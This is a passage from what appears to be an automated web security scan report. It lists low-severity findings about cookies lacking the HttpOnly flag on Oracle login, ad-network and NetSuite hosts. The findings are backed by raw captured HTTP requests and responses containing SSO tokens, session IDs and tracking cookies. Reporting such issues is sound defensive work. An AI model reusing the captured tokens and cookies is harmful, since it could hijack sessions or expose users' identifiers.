OAM_REQ=VERSION_4~J%2bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%2bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%2bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%2flJzu7m9%2f1lXhQDZkvLYt%2bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%2fwXpbFtlj2kGJ%2fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%2f%2fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%2fDEO%2fCYluZce8U%2bGGbT0K9o1sJA4XjxLL8%2f8AfNO%2fwgLKh%2bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%2f1ao%2btvjJSu1MtNbwWjD8UmI6Bp%2bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%2fcJMIXtw%2fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%2b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%2bbfWK8%2f54EneCznHCw32Dn13%2f%2b2dACr4TQeKM9Oua%2f%2bwnu%2bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%2bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%2fPItNWUsY%2bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%2fk2aJmyp8Ow%2fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%2bEXUOC%2f6G2f3htenFJenmnMekNt
Gu%2fXfaFZL8GjhhVe5W2JhMe%2bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%2fvB%2bACTy9lrXfSV77QwN%2buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%2bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%2fD4y50BLNBJCH%2b8a6B8NLIOqiOoU%2fCEYSRHDnFZv5HTMnTiqJZ%2bljcmdaGu3BPZkHEknjwJ%2frdJN%2fF4KZDIxyB3z0Gc63SxU5%2bTOVa2gKg9LLQNB2%2bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%2fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%2f010hrRBg%2bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%2f5w%3d%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

v=v1.4&request_id=-1117423317593169810&OAM_REQ=VERSION_4%7EJ%252bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%252bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQ
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:16:28 GMT
Set-Cookie: OAM_REQ=VERSION_4~8sDFSRHdibovgCmaA9kyeOsOvdSrurh9%2fYsDnUk2jlujlceQtRW%2fQNi%2flXtkj%2f1SgeTckB5GdKb4Hiz%2bcaNwewyERD7QcMRgfrRpVp90TY8%2bnYtDCyQML4cbcIJSBTocN%2bEcyowHjAV4T8IiI3ws7mDtrHQycjFS%2b95QII460g3qoNhW5NtfCCWtvEZPMmVBwHPgvUl5YR43OwJgq%2bgde0LQEam8lbD94jp4S6QIQXKKWPHI0shq11UCzQp5aTviul4GjqyWIuFn07nRX3c7G%2b8HAXNSYggrFqjg7N9UUmqwIfpGSKgxVQm2tlsyhx2lF5%2fX0znmI0CGPxx4YQVTl%2bytRrRVXkWsJKWAVC2FzkHt20rPSUn7Rzo%2bMTr39tUdbEwX6W8hNO2IrkJvXMMcG4bTMjA%2flK%2f4eDDKQ%2br%2f1adGjvQ2WW%2bXBGu1QE7ISAHAcp%2bIbTzC3qDrRlaOZfhk97Y08zoNSgWTBsG12KJsu03sFdYO857KTadQANWaeWqdu2Q2BUUGt%2fbNAg%2fENILYpeVU4d86XheiVhTMYekWWDmFlAWs0DYAM%2fCQK2ZXKVW7YTNKyMvHX1HQ2l4F5f%2bD6JGo%2f4Ry2rQnRq7GyVJ%2bzJQtF6jmJoT%2bzGRiv%2fNNNbbC31fjTRiLatV9yBVhBxppHWhW6bCA6QYsp5V74BcWmdtWQhbfiEnKZ3UmOb%2fCy1sG%2frCk%2fnPRs3cvRcBogNG7wow5PNoRfPVOUWXc7usXNYWVgHDEX%2fHWsui%2f4QTdBvYq%2ft2HetL6iIJD9WZ8jNh%2blmJa3smPgzYT9gacAilyIHHONowOlZ%2bcURiBuvAb7MvZxw9FgzeFFRCTo6x2xnhWElY4HbK7QFkICQ30JqYfGsrCQ8MDGbZGiAbZ46PvOXPiieaTuZc5UIc1bCKdSV1jOhoXiKS%2bwpAoSfC%2fe85ishtCItS6D9QwAU%2b6loe3DgvK4n71PHvaEEvoDHmJRu7cBud9m6v1ZVrhfxyTRXFlYRFNNuqkYAUxr7%2btX%2beHeWSxzLnrsRku1QxjbO9KosKHSaLFViJbMvbUqdCJO47kYlWlO1yUUjPaovy7hybBAbZv2lIBBYVBFi9AkrWVySFrl%2blnuYi%2f7VefR27D8%2fNlHuzS3d0uQp54NDsb3w0CM2d0ZEgF261aZjlrZDv7QPzW5%2fjv47uJUdUyzIIsrD%2fpO4WqefIJZkNbDUIiN4%2fU3MdciWfJk9ZyPeIuj4Z4SIQnGof8Zqf5FpE7YLidXdna2kuPrj9%2bWvOIEl0O6xE87fUHG83cMhqWltQTxdLcr7vm0KmM5n%2bc76Z0YYdmjqH48rlxK5HgZx%2bcLO0qjpOhfgGYsm%2blpKve%2bwUGhiGwuhvSfrI1RCpOeYzZT4Ow%2b7u5rIP2Z9n8CFs7YylZLN1thygm8RmyQw5PuTblocl9AFFvgH3MExec2L3WC0ymRApmsstEbF2Y%2bmnBtTbxMot3ZXMcfN9Aruj3T%2b%2b7D8u2Zv%2ffBdVt5qG3QItonF3FaFRiJ9QfIkvCT2vlYPQbI8jrJ5lqWqqYuyTS6DQdIJsSun1bXFZwksK9WdxHJGkOzAs3tM46h%2bhk9GQBqLceWigyZCuwHPI%2bHUUAq3a3j3jKLvi6eS5ZWrCxGXLqnsFSGQUWP7fElxGN35xwbvqMqetKjqX5VPTvDM4DINi0R1eoL5Xy8JofGj%2f1iEBuChkCDaSwb6sU%2b3ozVy4teWDpKd2ingo72r3r%2fM0rCvbbRfGlsN91sA%3d%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXg116uHK6EVADUS1EHWFB01taYd
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:16:28 GMT; path=/
Content-Length: 2359

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

13.110. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357 HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:13 GMT
Set-Cookie: OAM_REQ=VERSION_4~1UuUhb3VlJjpjbcfM%2bCo%2b%2bMiWJ2ThT1j0zV2GIRgsiVXHKq1wWviikzjAmSMNpHcxw1rhPxnndOe6siHyjxtbEM%2buYuUn%2bUvYKd01%2bdN5qmbCefoBjLXOdBrDbalBGhTFH1mcenZ6VQcZOtiYN8%2b2RhWlQVpI0kTgRyqGG40EECD4CxAU4gDEYcZmI2B3wNkljoMdwVuaGWnut3Ws3E5AmamcNRVrdECimq1Mq%2f26%2bWfrUnoqmsx7kxOsJNewr%2bnbiYvS6wDHfxOtJWhU9pUItq8bUkoQwr7H5isBCh5meyvKe8ms68i55w4CahCTz3p6A01AM2dYBzGmRORCv6MqWPBKK5rVQPutfIo4HtNsfY2j5bm56F%2fzt94BzXXWxxsIhITfd%2b5we89fEJFZ2CTJgrZuXFNGB8jvQYx1YE6%2b7ASPoQu6ptzJ7jgdMAcNsxu50KMjCTA9dS18y7RfMmioWGVZaXuiTS26UzYRBWtMqgP6BhdQZSlRcjTcuc46NN8nrnPWOZL4K3h0yZI3vi8mV4sFUAHB2aS%2fObCAYn0yTQ3hhne5ezNrHo%2bH9c64NxLbPfw7eZU0b%2b4HhsFiPrF8I3JW0kUOq2JgvMJfMrL2huNN1Zpg%2bCEZraUo1TgPJ0143QFgYSJe1eczDw2MyCnfK3oh6Qtd7KYCYZqmx2UGJZqdGMHwEYjBtChCnZ%2bAYXC52A7T7BfE9%2bsU5UIViqxLMgLQufDXehYMfsh5xmRetJCVQjKlYhNt7oMAXSuo9O2k7OMGli%2fN4scZh0Pzed3GEjYCczp0U22FIrQ0m%2f%2bmzDHuyeEtas2vlW6JqELbY%2fxow1EezrQ%2bGYJaUxmUmB0yGsjb2F1Rp7CJPqKBgfXUpG7wnI326ZeV6pmgG9tMIY562dx0jU2RAMPJ1RgtCLRBoiQfe5PC4CVl2COVV%2fQGPEJ08Ey9H8gUzMJnEcE45wTXctneFvp7B%2bb%2fqrgJErqrGicSt5dbvcFIsmoCMx7XapdWZKlBi1mu98HJYyULu6G89uz7J7F1OUfVHXvohzzOrSr%2becHY4ndhIRFBwY5sSgv%2bNzfUhO9kDgCTx%2bkyBXZS4ENTxntnbFbXdYwDRUy3ced%2bRD1gv6b5Z1m46L2ASxzktwc8%2ft6h2e%2fZddmlbvJWSuAKXOVJnZPHeqq52brL9R2gKGGj8BrRjerqgBbjDog3QbuqH%2fVAGSNF0SzQwxZUJ6%2bWrNxH4KdRN3jYQrSX8x8LET%2fNACGe9jkZHVZWQKO6%2bAYVadrfVlSSL%2fxDUaDg6rdboxh8xYhMFUB1iAtoS0tCXjvv8L7w3iNda8ERdiiOKy%2bzqxzLqwOti%2bDPDfBmzK%2fPqcoG4eKrU2QS0uiJhNKc1LBvRBAcEjEA6JPJyO7fKHt9Cm61%2bSMW0H4YGmgW1TDtuQ81K00oZc%2bvp8PB%2f5uw3pu3y%2bMHs5TOOFMQv3Ndu%2b6mY%2bqO4nzv3w6U6u8b08hyFm08mgiATuuPlAlRk03u%2bjPRx2hAvWC8poLvKtS0wKaWl8DTa79BTB7DLE8gKChrkaHA2PeautfHjr5C7tfyfsR4L%2fPbtHU2Ei28ge9mNEOIcqrE5h53SVtUecGk51ABEcw%2bu%2f5cvPKa%2frIBDaoUQChQjGIrYSm1J8qODITQ2AJoAe%2fULjYYDVDNM9Mso54mrVWl%2fTy3IZhZNmrS0J5kUhi9G7LHhiUKSx7Y%2fC%2bSPs%2fgVaAtG2nE93v6Y%2b3XHD8w%2fvIU6%2fjajSgqSI5oTv%2bgjlFIUeIzqAc%2fJkSJ%2b8Im1uaWQrVWrz8LjrbXglHGh4%2fdkgqoMYyj85f5xa%2f0NxgBcbU%2bceGpsINAzmIfwo%3d
; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXBDg6uHK6EVADUS1EHWFB01t_b1
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:13 GMT; path=/
Content-Length: 3286

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

13.111. http://m1215.ic-live.com/522/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m1215.ic-live.com
Path:   /522/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /522/?33083100&OVMTC=Broad&site=&creative=6492920360&OVKEY=beauty%20products&url_id=33083100 HTTP/1.1
Host: m1215.ic-live.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ngx_userid=50.23.123.106:1315327539133; pid2=1315301244rR4cN0jX2yM1; sid1460=1315327539qIJ0arLZTDmI99; cvt586=106159628; ngx_106159628=2011-09-06:09:45:39

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:44 GMT; Path=/
Set-Cookie: pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:44 GMT; Path=/
Set-Cookie: sid1215=1315327545U3aHt51RXPi099; Domain=.ic-live.com; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT"
Location: http://www.marykay.com/?pid=mk
Date: Tue, 06 Sep 2011 16:45:44 GMT
Set-Cookie: Coyote-2-a210828=a210872:0; path=/
Content-Length: 0


13.112. http://m1460.ic-live.com/586/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m1460.ic-live.com
Path:   /586/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /586/?106159628&OVMTC=Phrase&site=&creative=9131745784&OVKEY=beauty%20product&url_id=106159628 HTTP/1.1
Host: m1460.ic-live.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid2=1315301244rR4cN0jX2yM1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:40 GMT; Path=/
Set-Cookie: pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:40 GMT; Path=/
Set-Cookie: sid1460=1315327540EFWgV8Bzct0q99; Domain=.ic-live.com; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT"
Location: http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google
Date: Tue, 06 Sep 2011 16:45:40 GMT
Set-Cookie: Coyote-2-a210828=a210874:0; path=/
Content-Length: 0


13.113. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netsuite.tt.omtrdc.net
Path:   /m2/netsuite/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40 HTTP/1.1
Host: netsuite.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315341135013-154927.19; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 20-Sep-2011 15:32:28 GMT; Path=/m2/netsuite
Content-Type: text/javascript
Content-Length: 173
Date: Tue, 06 Sep 2011 15:32:27 GMT
Server: Test & Target

mboxFactories.get('default').get('me-ecomm-form-test',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315341135013-154927.19");

13.114. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12059.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1 HTTP/1.1
Host: oasc12059.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.cvs.com/CVSApp/search/search.jsp?searchTerm=shampoo+bandaid+xss&QP=N%3D92%26Ntk%3DAll%26Nty%3D1%26Ne%3D14%26Ntx%3Dmode+matchallpartial%26Nr%3DOR%7B92%2COR%7B93%7D%2COR%7B90%7D%2COR%7B122%7D%7D%26searchType%3DsearchHome&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:21 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R0ynx; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 807
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<script language="JavaScript" type="text/javascript" src="https://view.atdmt.com/DEN/jview/328347987/direct/01/823358824?click=http://oasc12059.247realmedia.com/RealMedia/ads/click_lx
...[SNIP]...

13.115. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6451/11953/20435-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6451/11953/20435-15.js?cb=0.7766812939662486&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=9844^2&11953^2; csi15=1295156.js^2^1315320939^1315320950&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^4; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61374; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=2553663.js^1^1315321025^1315321025&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:57:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1735

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "2553663"
...[SNIP]...

13.116. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6451/11953/20435-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6451/11953/20435-2.js?cb=0.2368586107622832&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6451/11953; ses15=9844^2&11953^5; csi15=2553663.js^2^1315321038^1315321048&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:41 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^2&11953^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61338; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=1295153.js^2^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; expires=Tue, 13-Sep-2011 14:57:41 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2097

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "1295153"
...[SNIP]...

13.117. http://optimized-by.rubiconproject.com/a/dk.html

Summary

